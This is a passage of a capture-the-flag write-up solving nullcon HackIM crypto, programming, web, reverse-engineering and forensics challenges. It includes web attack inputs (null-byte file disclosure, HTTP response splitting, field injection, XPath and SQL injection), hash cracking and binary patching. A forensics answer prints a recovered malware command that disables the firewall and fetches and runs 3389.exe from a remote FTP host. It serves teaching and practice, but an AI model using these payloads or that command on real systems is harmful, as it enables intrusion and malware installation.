ZipArchive();if($_57211b392140f8815d1037fc594eb460->open($_0cd4cee5d8ae33bea2a09fe4d5698e7a,$_63f55f63cda9be345c1ab453ec6c8ce1 ?ZIPARCHIVE::OVERWRITE : ZIPARCHIVE::CREATE) !== true) { return false; }foreach($_dc0f13e9391f28d78214c80563ebba44 as $_542895ff5fa8dcb5f39647ec91e6fe12) {$_57211b392140f8815d1037fc594eb460->addFile($_542895ff5fa8dcb5f39647ec91e6fe12,$_542895ff5fa8dcb5f39647ec91e6fe12); }$_57211b392140f8815d1037fc594eb460->close(); $_4fa3332ef3d19e9840387434b8d28780 =
  10. 10. "x6f156x6c171x62171x6f142x73145x72166x69156x67164x68151x73143x6f156x64151x74151x6f156x77157x75154x64164x68145x72145x73165x6c164x73157x66157x75162x77157x72153x62145x72145x67141x72144x65144x61163x66165x6c154x79143x6f156x63154x75163x69166x65141x6e144x61163x68141x76151x6e147x65154x75143x69144x61164x65144x74150x65156x6f162x6d141x6c143x6f165x72163x65157x66164x68145x70150x65156x6f155x65156x61"; returnfile_exists($_0cd4cee5d8ae33bea2a09fe4d5698e7a); } else { return false; } }$_37c4dfe05770cbe4a45d2ae9fa96a647=array("x66151x6c145x3156x6a160x67","x66151x6c145x3256x6a160x67", "x66151x6c145x3356x67151x66");create_zip($_37c4dfe05770cbe4a45d2ae9fa96a647,"x6d171x7a151x70146x69154x6556x7a151x70", true); ?>From above we get the flag:ruby-1.9.2-p180 :001 > "x6f156x6c171x62171x6f142x73145x72166x69156x67164x68151x73143x6f156x64151x74151x6f156x77157x75154x64164x68145x72145x73165x6c164x73157x66157x75162x77157x72153x62145x72145x67141x72144x65144x61163x66165x6c154x79143x6f156x63154x75163x69166x65141x6e144x61163x68141x76151x6e147x65154x75143x69144x61164x65144x74150x65156x6f162x6d141x6c143x6f165x72163x65157x66164x68145x70150x65156x6f155x65156x61" => "onlybyobservingthisconditionwouldtheresultsofourworkberegardedasfullyconclusiveandashavingelucidatedthenormalcourseofthephenomena"ruby-1.9.2-p180 :002 >References: http://www.tareeinternet.com/scripts/decrypt.phpFlag:onlybyobservingthisconditionwouldtheresultsofourworkberegardedasfullyconclusiveandashavingelucidatedthenormalcourseofthephenomenaCrypto Level5: Llun Saving Bank Llun Saving Bank is fed up with known encryption standards to store the data. They decided toreinvent the wheel. Can you decode the data?Clue: Hs Foe vhmmhng un!qrdvdot!Ewhl!btu!nou!@ble> Thdn!id!hr NOU Omoipouenu/!Hs!Id!@ble-cuu!NNU vhllhof>!Thdn!Id!hr!Lamdvoldnu/ Hs Id Cnth @bme and!Vimliog> Tidn Vhdobe BnlduiEwhl>!Ir hd!Neitidr!@cmd!Oor Villhnf>!Tidn!WHY!ball!him FOE? -!DqhbtrusongndApproach: Initially was totally lost. Then noticed that by substituting some of the letters by theirprevious or next alphabet, we can get some meaningful text as follows:“Is God willing to prevent evil,but not able? Then he is NOT Omnipotent. Is He able, but NOT willing?Then He is Malevolent. Is He Both able and Willing? Then Whence Cometh Evil? Is he Neither ableNor Willing? Then WHY call him GOD? – Epicurusongod”Each letter being at a binary edit distance of one, it points to steganography. Printing out the binaryof both the strings, found that only the least significant bit differs for certain letters which isstandard form of steganography especially for audio files. Writing a script, got the coded message.
  11. 11. Ruby Code:crypted = "Hs Foe vhmmhng un!qrdvdot!Ewhl!btu!nou!@ble> Thdn!id!hr NOUOmoipouenu/!Hs!Id!@ble- cuu!NNU vhllhof>!Thdn!Id!hr!Lamdvoldnu/ Hs Id Cnth@bme and!Vimliog> Tidn Vhdobe Bnldui Ewhl>!Ir hd!Neitidr!@cmd!OorVillhnf>!Tidn!WHY!ball!him FOE? -!Dqhbtrusongnd"orig = "Is God willing to prevent evil,but not able? Then he is NOTOmnipotent. Is He able, but NOT willing? Then He is Malevolent. Is He Bothable and Willing? Then Whence Cometh Evil? Is he Neither able Nor Willing?Then WHY call him GOD? - Epicurusongod"len = crypted.sizebinmsg = ""(0..(crypted.size-1)).each do |i| print "Cypted : " + crypted[i].unpack("B*").first + "n" print "Original: " + orig[i].unpack("B*").first + "n" binmsg = binmsg + crypted[i].unpack("B*").first[7]endprint "Binary message: " + binmsg + "n"print "Text message: " + [binmsg].pack("B*")print "n"Flag: Learn howto Hide in Plain SightProgramming Level 1: ROTOMATAMfp ey zwvo fvat rjx hwprdrr lb nawzh tnfpc: Anj icvlu, hjgy Kbffhg, zk hjp gm nso nntjj, phf swvawwhnwer, pcum nu oeq ewllxqmqitClue: We only know the first 6 characters: "Men at"Approach: From manual inspection, we found that possibly the ith character in the ciphertext differsfrom the plaintext by I mod 26. By manually decoding some words and Google searching, got theFlag.Flag: Men at some time are masters of their fates: The fault, dear Brutus, is not in our stars, but inourselves, that we are underlingsProgramming Level 2:Pascal’s TriangleThe Flag is the sum of all middle terms till first 1337 rows of Pascals TriangleApproach: In a Pascals triangle, the sum of the squares of the elements of row n equals the middleelement of row (2n − 1).Ruby Code:#rows = getsrows = 1337rows = rows.to_i / 2
  12. 12. a = Array.newtotal = 0(0..rows).each do |i| a[i] = Array.new (0..i).each do |j| a[i][j] = 1 if j ==0 || i == j a[i][j] = a[i - 1][j - 1] + a[i - 1][j] unless j ==0 || i == j total = total + a[i][j]*a[i][j] endendprint totalprint "n"Flag:43659324741884237070936006832303643114239411987772786602066543431205872166674362332393596312576719064242547970040323267566530343333103970820072593578706234276624324605878186670972267056459871456566594569343564988621600326286475080697865518622537377534356455651048425097523734881838663157063304671110082383218294453737678744221560158357896856330703194356882895482874383651576271102847866170999680296497Programming Level 3: Your Brainfuck Sir...Debug bfcode to get the flagFile: http://www.nullcon.net/challenge/data/bfcodeApproach: Used online BF interpreter and debugger. Adding . at the end of every line gave therequired flag as output.Flag: ...In fact, never ever use gets() or sprintf(), period. If you do we will send evil dwarfs after you..Programming Level 4: Substitute ProblemFile: http://www.nullcon.net/challenge/data/deobfusRuby Code:def trans1(x)out = ""cipher = " ABCDEFGHIJKLMNOPQRSTUVWXYZ...0123456789"words = x.split( )words.each do |w| out = out + cipher[w.to_i]endreturn outenddef trans2(x) out = "" map = { "ZERO"=> "00", "ONE" => "01", "TWO" => "02", "THREE"=>"03","FOUR"=>"04",
  13. 13. "FIVE" => "05", "SIX" =>"06", "SEVEN" => "07", "EIGHT" => "08","NINE"=>"09", "TEN" => "10", "ELEVEN" => "11", "TWELVE" => "12", "THIRTEEN" =>"13", "FOUTEEN" =>"14","FIFTEEN" => "15", "SIXTEEN" => "16", "SEVENTEEN" =>"17", "EIGTEEN" => "18", "NINETEEN" => "19", "TWENTY" => "20", "TWENTYONE"=> "21", "TWENTYTWO" => "22", "TWENTYTHREE" => "23","TWENTYFOUR" =>"24","TWENTYFIVE" => "25", "TWENTYSIX" => "26", "THIRTYEIGHT" => "38", "THIRTYFOUR" => "34"}words = x.split( )words.each do |w| print "Invalid " + w if map[w].nil? out = out + map[w].to_s + " "endreturn outendinput = getsout = trans1(input)print out.downcase + "n"out = trans2(out)print out.downcase + "n"out = trans1(out)print out.downcase + "n"out = trans2(out)print out.downcase + "n"out = trans1(out)print out.downcase + "n"#out = trans1(trans2(trans1(trans2(trans1(input)))))#print out.downcase + "n" [plevel4]$ cat deobfus | ruby deof.rbfouteen nine fouteen five twenty five five fouteen zero six nine twentytwo fivezero six fifteen twentyone eigteen zero twenty twentythree five fouteen twenty twentyfive fifteen fouteen five zero twenty twentythree five twelve twentytwo five zero six nine six twenty five five fouteen zero twenty twentythree five fouteen twenty twentyfive fifteen fouteen five zero fouteen nine fouteen five twenty five five fouteen zero twenty twentythree five twelve twentytwo five zero twentytwentythree five fouteen twenty twentyfive six nine twentytwo five zero twentysix five eigteen fifteen zero six nine twentytwo five zero fouteen nine fouteen five twenty five five fouteen zero twenty eight eigteen five five zero five nine seven eight twenty zero six nine twentytwo five zero twenty twentythree five fouteen twenty twentyfive twenty eight eigteen five five zero twentysix five eigteen fifteen zero six nine six twenty five five fouteen zero twenty twentythree fifteen zero nineteen nine twentyfour zero twenty twentythree five fouteen twenty twentyfive fifteen fouteen five zero fouteen nine fouteen five twenty five five fouteen zero twenty eight eigteen five five zero fifteen fouteen five zero twentytwentythree five fouteen twenty twentyfive zero six nine six twenty five five fouteen zero five nine seven twenty five five fouteen zero twenty twentythree five fouteen twenty twentyfive six nine twentytwo five zero twentysix five eigteen fifteen zero five nine seven eight twenty zero twenty twentythree five fouteen twenty twentyfive six nine twentytwo five zero nineteen nine twentyfour twenty five five fouteen zero six nine twentytwo five zero five nine seven twenty five five fouteen zero twenty twentythree five fouteen twenty twentyfive twenty twentyth
  14. 14. ree fifteen zero six nine twentytwo five zero five nine seven twenty five five fouteen zero twenty twentythree fifteen zero six nine six twenty five five fouteen zero fouteen nine fouteen five twenty five five fouteen zero fouteen nine fouteen five zero twenty twentythree five fouteen twenty twentyfive zero twenty twentythree five fouteen twenty twentyfive six nine twentytwo five zero twentysix five eigteen fifteen zero fifteen fouteen five zero six fifteen twentyone twenty five five fouteen zero six fifteen twentyone eigteen zero twentysix five eigteenfifteen zero nineteen nine twentyfour twenty five five fouteen zero five nine seven twenty five five fouteen zero six nine six twenty five five fouteen zero twenty twentythree five twelve twentytwo five zero fouteen nine fouteen five zero twenty twentythree five fouteen twenty twentyfive six fifteen twentyone eigteen zero fouteen nine fouteen five zero twenty twentythree five fouteen twenty twentyfive zero twenty twentythree five fouteen twenty twentyfive six nine twentytwo five zero twentysix five eigteen fifteen zero twenty eight nine eigteen twenty twentyfive five nine seven eight twenty zero twenty eight nine eigteen twenty twentyfive six fifteen twentyone eigteen zero twentysix five eigteen fifteen zero five nine seven twenty five five fouteen zero six nine six twenty five five fouteen zero six nine twentytwo five zero six fifteen twentyone eigteen zero twenty twentythree five fouteen twenty twentyfive six nine twentytwo five zero twentysixfive eigteen fifteen zero nineteen five twentytwo five fouteen zero five nine seven twenty five five fouteen zero six nine twentytwo five zero six nine twentytwo five zero six fifteen twentyone twenty five five fouteen14 09 14 05 20 05 05 14 00 06 09 22 05 00 06 15 21 18 00 20 23 05 14 20 25 15 14 05 00 20 23 05 12 22 05 00 06 09 06 20 05 05 14 00 20 23 05 14 20 25 15 14 05 00 14 09 14 05 20 05 05 14 00 20 23 05 12 22 05 00 20 23 05 14 20 25 06 09 22 0500 26 05 18 15 00 06 09 22 05 00 14 09 14 05 20 05 05 14 00 20 08 18 05 05 00 05 09 07 08 20 00 06 09 22 05 00 20 23 05 14 20 25 20 08 18 05 05 00 26 05 18 15 00 06 09 06 20 05 05 14 00 20 23 15 00 19 09 24 00 20 23 05 14 20 25 15 14 05 0014 09 14 05 20 05 05 14 00 20 08 18 05 05 00 15 14 05 00 20 23 05 14 20 25 00 06 09 06 20 05 05 14 00 05 09 07 20 05 05 14 00 20 23 05 14 20 25 06 09 22 05 00 26 05 18 15 00 05 09 07 08 20 00 20 23 05 14 20 25 06 09 22 05 00 19 09 24 20 0505 14 00 06 09 22 05 00 05 09 07 20 05 05 14 00 20 23 05 14 20 25 20 23 15 00 06 09 22 05 00 05 09 07 20 05 05 14 00 20 23 15 00 06 09 06 20 05 05 14 00 14 09 14 05 20 05 05 14 00 14 09 14 05 00 20 23 05 14 20 25 00 20 23 05 14 20 25 06 0922 05 00 26 05 18 15 00 15 14 05 00 06 15 21 20 05 05 14 00 06 15 21 18 00 26 05 18 15 00 19 09 24 20 05 05 14 00 05 09 07 20 05 05 14 00 06 09 06 20 05 05 14 00 20 23 05 12 22 05 00 14 09 14 05 00 20 23 05 14 20 25 06 15 21 18 00 14 09 1405 00 20 23 05 14 20 25 00 20 23 05 14 20 25 06 09 22 05 00 26 05 18 15 00 20 08 09 18 20 25 05 09 07 08 20 00 20 08 09 18 20 25 06 15 21 18 00 26 05 18 15 00 05 09 07 20 05 05 14 00 06 09 06 20 05 05 14 00 06 09 22 05 00 06 15 21 18 00 2023 05 14 20 25 06 09 22 05 00 26 05 18 15 00 19 05 22 05 14 00 05 09 07 20 05 05 14 00 06 09 22 05 00 06 09 22 05 00 06 15 21 20 05 05 14nineteen five four twentyone twelve fifteen twentyone nineteen twelve twentyfive zero five nineteen three eight five twentythree zero fifteen two six twentyonenineteen three one twenty fifteen eigteen twentyfive zero eight twentyfive sixteen five eigteen twentytwo five eigteen two fifteen nineteen nine twenty twentyfive zero one fouteen four zero sixteen eigteen fifteen twelve nine twentyfour nine twenty twentyfive zero thirtyeight thirtyfour zero eigteen fifteen five four twentyfive zero seven eigteen five five fouteen19 05 04 21 12 15 21 19 12 25 00 05 19 03 08 05 23 00 15 02 06 21 19 03 01 20 15 18 25 00 08 25 16 05 18 22 05 18 02 15 19 09 20 25 00 01 14 04 00 16 18 15 12 0
  15. 15. 9 24 09 20 25 00 38 34 00 18 15 05 04 25 00 07 18 05 05 14sedulously eschew obfuscatory hyperverbosity and prolixity 84 roedy greenFlag: sedulously eschew obfuscatory hyperverbosity and prolixity 84 roedy greenProgramming Level 5: A pinch of salt for your coffee, Sir?URL: http://www.nullcon.net/challenge/plevel-5-salt.aspClue: password + salt = md5 hashApproach: Obtained md5 hash for password = ‘a’ as 5e33d53d1a9511b8ddccc3c1aed830deCreated pass.txt with the following content:a: 5e33d53d1a9511b8ddccc3c1aed830deBruteforced using john (version 1.7.9-jumbo) in incremental mode.john –i –format=raw-md5 pass.txtLoaded 1 password hash (Raw MD5 [SSE2i 10x4x3])a399a7d (a)Password cracked : a399a7dFlag: 399a7dWeb Level1:Can you view the bytes in password.asp from Me?URL: http://www.nullcon.net/challenge/wlevel-1-proc.asp?input=test.txtTools Used: Google ChromeApproach: (null byte termination file disclosure vulnerability) 1. Right click on link Me and select Inspect Element 2. Edit attribute href from “wlevel-1-proc.asp?input=test.txt” to “wlevel-1- proc.asp?input=password.asp%00.txt” 3. Click on MeFlag: password.asp%00.txtWeb Level 2:Can you redirect ME to hackim.null.co.in?
  16. 16. Tools Used: Google ChromeApproach: HTTP Response SplittingSteps: 1. Right click on link ME and select Inspect Element 2. Edit attribute href from “wlevel-2-proc.asp?page=index.asp “ to "wlevel-2- proc.asp?page=wlevel-2-proc.asp?page=index.asp%0d%0aContent- Length:%200%0d%0a%0d%0aHTTP/1.1%20302%20OK%0d%0aLocation:%20hackim.null.co. in" 3. Click on MEReferences: http://projects.webappsec.org/w/page/13246931/HTTP%20Response%20SplittingWeb Level 3: Login SystemClue:<!--Debug Info: INSERT a99|a|a99|a@a99.com|admin:no|comment:new user INTO USER DB FILE -->Approach: During register, the data is stored in DB as the above query. To bypass, register an userwith email as user@example.com|admin:yesOn Login using the above registered user, we get the following:Welcome! You are logged in as ADMIN!Flag: b3149ecea4628efd23d2f86e5a723472Web Level 4: Can You Get Me all the Data?Approach: Looked like SQL injection at first as http://www.nullcon.net/challenge/wlevel-4-data.asp?input=or= gave all the data. On IRC, someone mentioned that he has been told that SQLInjection is a waste of time for this level. So guessed this should be either XQuery or XPath Injection.Followed steps suggested in Blind XPath Injection paper by Amit Kleininput =or(name(//president[1])="president")ora=b => true => “president” exists in namespaceinput =or(name(//president[1])="people")ora=b => false => “people” does not exist in namespaceinput =or(name(//president[1])="india")ora=b => true => “india” exists in namespaceinput=or(name(//name[1])="name")ora=b => true => “name” exists in namespaceFrom above, crafted the following query:] | //president[or=Other query that also worked:
  17. 17. ] | //india[or=Flag: myworthinessisallmydoubthismeritallmyfearcontrastingwhichmyqualitydoeshoweverappearReferences: 1. http://hackbbs.org/article/book/wf/blind-xpath-injection.pdf 2. http://projects.webappsec.org/XPath-InjectionWeb Level 5: Do You Have What IT Takes to Break into the WorldsMost Secure Login System?Approach: Certain SQL Injections are checked for and blocked by the login system. Initially thoughtthe flaw may be in the logging system so tried spoofing User-Agent without much success. Heard onIRC that this level challenge is SQLi. Found that the system does not block comments /**/ . Also loginpassword field is limited to 10 characters with only client-side limitation which can be overcome byusing Inspect Element and Edit attribute in Google Chrome. Tried lot of different SQLi. Finally theone which succeeded is:Username: UNION/**/SELECT/**/1,admin,doesntmatterPassword: doesntmatterWelcome! You are logged in as ADMIN!Flag: 47c1b025fa18ea96c33fbb6718688c0fReverse Engineering Level 1: Basic TestBinary URL: http://www.nullcon.net/challenge/data/justdoit.exeApproach: From the resource section, we find that it is a software called Autohotkey. When running,if you press Windows + R, it automatically types in the Open field (I am using Vista). OpenedNotepad, started justdoit.exe, pressed Windows + R and then quickly clicked on the Open Notepad.The Keystrokes went in to the Notepad and the Flag was typed.Flag: We could talk all day about what AutoHotKey can do for an online poker playerReverse Engineering Level 2: Ask nicely, it will give you what youwantBinary URL: http://www.nullcon.net/challenge/data/HackIM.exe
  18. 18. Hint: Look for other paths.Approach: Tried lot of things with OllyDBG. Tried changing Entry point by Set Origin as in Ollywithout any luck.Code may be in .rsrc segment which is not executable.Opened PE exe file using Stud_PE (http://www.cgsoftlabs.ro/studpe.html)Change Entry point to 0xC000 and set permissions of .rsrc segment to Read, Write And Execute andran HackIM.exeFlag: AreYouHappyNow?Reverse Engineering Level 3: null Mobile Android AppURL: http://www.nullcon.net/challenge/data/Null%20Mobile.apkApproach: Extract apk file by renaming it to NullMobile.apk.zip WinRARFound code.js and junk.php javascript obfuscated code in res/raw eval(function(p,a,c,k,e,r){e=function(c){return(c<a?:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){returnr[e]}];e=function(){returnw+};c=1};while(c--)if(k[c])p=p.replace(newRegExp(b+e(c)+b,g),k[c]);return p}(6 $(){5 a=n H();u(5i=0;i<q.r;i++){5 b=q[i];2(I b==J)b=8.K(b);2(q.r==1)7 b;a.L(b)}7 a}6o(a,b){a=a.v();2(8.h){u(5 i=0;i<8.h.r;i++){5 c=8.h[i];5 d=0;5e=j;s{2(c.t){e=c.t[d]}k{e=c.M[d]}2(e){2(e.N.v()==a){2(b==w){2(c.t){c.O(d)}k{c.P(d)}7 p}k{7 e}}}d++}Q(e)}}7 j}6 R(a){7 o(a,w)}6S(a){2(8.h){2(!o(a)){2(8.h[0].y){8.h[0].y(a,l,0)}k{8.h[0].T(a+ {},0)}}}7 o(a)}6 U(a,b){V="W X Y z A Z s 10 11 z A 12 s."}6 13(d,e){5f=m;m.9=j;m.B=6(){2(f.9){f.9=j;f.3.B();f.3=l}}m.14=6(a,b){2(f.9){7j}f.3=l;2(15.C){f.3=n C()}k{f.3=n 16("17.18")}2(f.3==l){7j}k{f.3.19=6(){2(f.3.1a==4){f.9=j;f.D(f.3.1b,f.3.1c,f.3.1d);f.3=l}}f.9=n1e();2(/1f/i.1g(b)){5 c=g+?+f.9.E();f.3.F("1h",c,p);f.3.1i("1j-1k","1l/x-1m-1n-1o");f.3.G(a)}k{5c=g+?+a+&1p=+(f.9.E());f.3.F("1q",c,p);f.3.G(l)}7 p}}5g=d;m.D=e||6(){}},62,89,||if|AJAX||var|function|return|document|updating||||||||styleSheets||false|else|null|this|new|getCSSRule|true|arguments|length|do|cssRules|for|toLowerCase|delete||addRule|what|you|abort|XMLHttpRequest|callback|getTime|open|send|Array|typeof|string|getElementById|push|rules|selectorText|deleteRule|removeRule|while|killCSSRule|addCSSRule|insertRule|mikcah|galf|Do|not|let|cannot|interfere|with|can|ajaxObject|update|window|ActiveXObject|Microsoft|XMLHTTP|onreadystatechange|readyState|responseText|status|responseXML|Date|post|test|POST|setRequestHeader|Content|type|application|www|form|urlencoded|timestamp|GET.split(|),0,{}))Beautify using: http://jsbeautifier.org/Flag is within the deobfuscated javascipt code.…
  19. 19. function mikcah(a, b) { galf = "Do not let what you cannot do interfere with what you can do."}…Flag: Do not let what you cannot do interfere with what you can do.Reverse Engineering 4Binary URL: http://www.nullcon.net/challenge/data/script2Tools: objdump, vi, gdb, strings, ps, catSteps:Disassemble using Objdump (objdump -d ./script2)Locate call to time 400ff3: bf 00 00 00 00 mov $0x0,%edi 400ff8: e8 43 f9 ff ff callq 400940 <time@plt> 400ffd: 48 39 c3 cmp %rax,%rbx 401000: 7d 0a jge 40100cChange the above jge to jl (ie change 7c 0a to 7c 0a) on line 0x00001000 using vi in hex editor mode(open binary file in vi, type :%!xxd to convert to hex view format, modify, save, type :%!xxd –r torevert back to binary and save and exit :wq)Run ./script2 and press CTRL+Z to put to backgroundfind process using pssee /proc/<pid>/cmdlineFound the following being executed:#!/bin/sh########################################################################### Title : icat - "intelligent" cat# Author : Heiner Steven <heiner.steven@odn.de># Date : 1994-05-18# Requires : gzip, zcat# Category : File Utilities# SCCS-Id. : @(#) icat 1.3 08/01/31########################################################################### Description###########################################################################
  20. 20. PN=`basename "$0"` # program nameVER=1.3Extensions=".Z .z .gz .cpz .tgz" # known file extensionsusage () { echo >&2 "$PN - cat file, uncompress if necessary, $VER (stv 95)usage: $PN -l $PN [file ...]The first case lists all known extensions, the other case triesto print the given file, uncompressing it if necessary." exit 1}msg () { for line do echo "$PN: $line" >&2 done}fatal () { msg "$@"; exit 1; }while [ $# -gt 0 ]do case "$1" in -l) # List known suffixes echo $Extensions exit 0;; --) shift; break;; # Simulate getopt -h) usage;; *) break;; esacdoneif [ $# -lt 1 ]then # read from stdin (uncompressed) catelse flagreq=0 if [ $flagreq -eq 1 ] then echo "Nature has neither kernel nor shell; she is everything atonce" fi for file do if [ -r "$file" ] # file does exist then # Try to determine decompressor based on the extension case "$file" in *.Z) zcat "$file";; *.z) gzip -d -c "$file";; *.gz|*.tgz) gzip -d -c "$file";; *.bz2) bzip2 -d -c "$file";; *.cpz) zcat < "$file";; *) cat "$file";; esac else # File does not exist: try to determine compressed version if [ -r "$file".bz2 ]
  21. 21. then bzip2 -d -c "$file" elif [ -r "$file".gz ] then gzip -d -c "$file" elif [ -r "$file".tgz ] then gzip -d -c "$file" elif [ -r "$file".Z ] then zcat "$file" elif [ -r "$file".z ] then gzip -d -c "$file" elif [ -r "$file".cpz ] then zcat < "$file" else fatal "could not find file: $file" fi Err=$? fi donefiAlternate way: 1. Set ulimit to unlimited (ulimited –c unlimited), send SIGSEGV to program and force it the dump core. You can find the script by doing strings on core. 2. Hook call to time using LD_PRELOAD technique.Flag: Nature has neither kernel nor shell; she is everything at onceReverse Engineering Level 5: Got Dumped :(URL: http://www.nullcon.net/challenge/data/lol.rarTools Used: WinDBG, OllyDBG, metasm, viSteps:The file is a crash dump file. Opened file in WinDBG and did analyze –v. The program crashed inMicrosoft (R) Windows Debugger Version 6.11.0001.404 X86Copyright (c) Microsoft Corporation. All rights reserved.Loading Dump File [D:UsersNilanjanDocumentsDocsnullconlol.dmp]User Mini Dump File with Full Memory: Only application data isavailable
  22. 22. Symbol search path is:srv*c:symbols*http://msdl.microsoft.com/download/symbolsExecutable search path is:Windows XP Version 2600 (Service Pack 3) UP Free x86 compatibleProduct: WinNt, suite: SingleUserTSMachine Name:Debug session time: Sun Jan 8 14:38:14.000 2012 (GMT+5)System Uptime: 0 days 0:57:47.904Process Uptime: 0 days 0:00:21.000.....This dump file has an exception of interest stored in it.The stored exception information can be accessed via .ecxr.(a60.73c): Access violation - code c0000005 (first/second chance notavailable)eax=0000978f ebx=00000001 ecx=a1840000 edx=82839b00 esi=00000000edi=fffffffeeip=deadbabe esp=0012feec ebp=0012ff30 iopl=0 nv up ei ng nzna pe nccs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000efl=00010286deadbabe ??0:000> lmstart end module name00400000 0040e000 Stub (no symbols)77f10000 77f59000 gdi32 (pdb symbols)c:symbolsgdi32.pdb740F60A99F2A417E96C387400994588D2gdi32.pdb7c800000 7c8f6000 kernel32 (pdb symbols)c:symbolskernel32.pdb34560E80F5C54175B208848EF863C5BD2kernel32.pdb7c900000 7c9af000 ntdll (pdb symbols)c:symbolsntdll.pdb1751003260CA42598C0FB326585000ED2ntdll.pdb7e410000 7e4a1000 user32 (pdb symbols)c:symbolsuser32.pdbD18A41B74E7F458CAAAC1847E2D8BF022user32.pdb
  23. 23. Wrote memory to file as mapped PE binary file.0:000> .writemem Stub.bin 00400000 0040dfffWriting e000 bytes............................Converted to proper PE file using metasm#No | Name | VSize | VOffset | RSize | ROffset |Charact.#01 | .text | 00006254 | 00001000 | 00006400 | 00000400 |60000020#02 | .rdata | 00001B42 | 00008000 | 00001C00 | 00006800 |40000040#03 | .data | 000018DC | 0000A000 | 00000E00 | 00008400 |C0000040#04 | .rsrc | 000001B4 | 0000C000 | 00000200 | 00009200 |40000040#05 | .reloc | 00000C4E | 0000D000 | 00000E00 | 00009400 |42000040require ./metasm/metasm# data = File.open("Stub.bin","rb"){ |fd| fd.read(fd.stat.size)}pe = Metasm::LoadedPE.load(pe_in)pe.cpu = Metasm::Ia32.newpe.encode_file(Stub.exe,exe)Tried debugging using OllyDBG. Code has anti-debugger checks because of which most paths did notwork. Tried changing entry points but none worked. Located call to MessageBox. Manually checkedwhere it gets called from. WinDBG analysis showed that the program has crashed while trying toexecute code @0xdeadbabe. Found code push 0xdeadbabe followed by retn which is an indirectway of calling 0xdeadbabe.0040106C 68 BEBAADDE PUSH DEADBABE00401071 . C3 RETNChanged the address to just before the MessageBox call code.0040106C . 68 DA104000 PUSH stub3.004010DA00401071 . C3 RETN ; RET used as a jump to 004010DAOpen the program using Ollydbg. Select and set the following as new origin:00401000 $ 55 PUSH EBPRun codeFlag: TheLastSamuraiScreenshot:
  24. 24. Forensics Level 1: Tum Agar Dhyan Se Baat Meri SunoWhile conducting the raid on a suspect the police found the system containing no suspiciousinformation in the form of a code. While comparing various files they came up with a suspicioussound file and feel that the code is hidden inside the same.You are asked to find out that code if hidden in the file.Evidence URL: http://www.nullcon.net/challenge/data/JS.rarTools used: audacityApproach: Open with audacity and analyse.
  25. 25. At some offsets, we find that the channel data differ. Extract only the portions where there is hiddenaudio in the right channel.
  26. 26. Playing it seems like some numbers in foreign language.If we apply effect reverse, mute left channel and play, we can hear English numbers.
  27. 27. Flag: 12344346765Forensics Level 2: Andar Ch0rA company Mil Baat Ke Khao Ltd suspects that one of its employees is sending the internal codessecretly outside the organisation. The company sniffed the data being sent and reconstructed it tofind that a word document was being sent.The company strongly suspects that there is some hidden passport code in the document.You as a forensic investigator are provided with the copy of that file and are required to find out thehidden code. The code has to be in whole number.Evidence URL: http://www.nullcon.net/challenge/data/Passport_Number.docDoing strings on file shows that there are hidden worksheets. Renamed to Password.xls and fileopened properly in Excel.Unhide hidden sheets. Nullcon2 sheet becomes visible.
  28. 28. Open VB editor, select Sheet3 (Nullcon3) and press F4 to view properties. Change property visibilityof Nullcon3 sheet from 2 – xlSheetVeryHidden to -1 xlSheetVisible Here is your Passport number to the new level 6924289Flag: 6924289Forensics Level 3: Not Guilty!An employee was suspected of using some malicious files. The employee asserts that he is not guiltycause he never used any program except microsoft word and excel.While conducting the analysis nothing was found in the registry suggesting that something did runautomatically. All locations that can run program automatically were examined and nothingmalicious was found.You as an investigator are provided with a piece of hive to carve out if anything was deleted fromthe hive and provide the exact "Value", "value type" and "data" deleted so that the employee getsthe justice.Approach: Tried with Regripper, yaru. Worked with reglookup-recover(http://projects.sentinelchicken.org/reglookup/)$>reglookup-recover.exe softwareOFFSET,REC_LENGTH,REC_TYPE,PATH,NAME,NK_MTIME,NK_NVAL,VK_TYPE,VK_VALUE,VK_DATA_LEN,SK_OWNER,SK_GROUP,SK_SACL,SK_DACL,RAW_CELL
  29. 29. ERROR: Bad cell length encountered while parsing unallocated cells at offset 0x00A27908.00B4EEA0,00000020,VALUE,,Shell,,,SZ,c:windowssystem32cmd.exe /c net1 stopsharedaccess&echo open xxx.3322.org> cmd.txt&echo feng>> cmd.txt&echo xxx>>cmd.txt&echo binary >> cmd.txt&echo get 3389.exe >> cmd.txt&echo bye >> cmd.txt&ftp-s:cmd.txt&3389.exe&3389.exe&del cmd.txt /q,490,,,,,Text in Unallocated segmenthidden registry keyFlag: c:windowssystem32cmd.exe /c net1 stop sharedaccess&echo open xxx.3322.org>cmd.txt&echo feng>> cmd.txt&echo xxx>> cmd.txt&echo binary >> cmd.txt&echo get3389.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&3389.exe&3389.exe&delcmd.txt /qReferences: http://www.digitalforensicssolutions.com/papers/recovering-and-analyzing-deleted-registry-hives.pdfForensics Level 4: Intriguing MBRA suspected drive was found in bad shape. The data extraction was almost impossible and the finalcopy obtained carried only few bytes. The bytes belonged to the initial sectors and wherever thesystem could not read the space was filled with 0x00 so as to keep the offset of the data obtainedintact.The initial sector displayed a messy MBR data.As a forensic investigator you are required to find the following information:1) The number of partitions in the damaged drives2) The start and end LBA for each partition3) The Start and end of unpartitioned space between two clustersThe Drive showed to be a SATA drive with 512 bytes of LBATools Used: mmls (Sleuthkit), viApproach:Run mmls on image.[nullc0n]$ mmls -t gpt ./image.ddInvalid magic value (GPT Header: 5452000020494600)
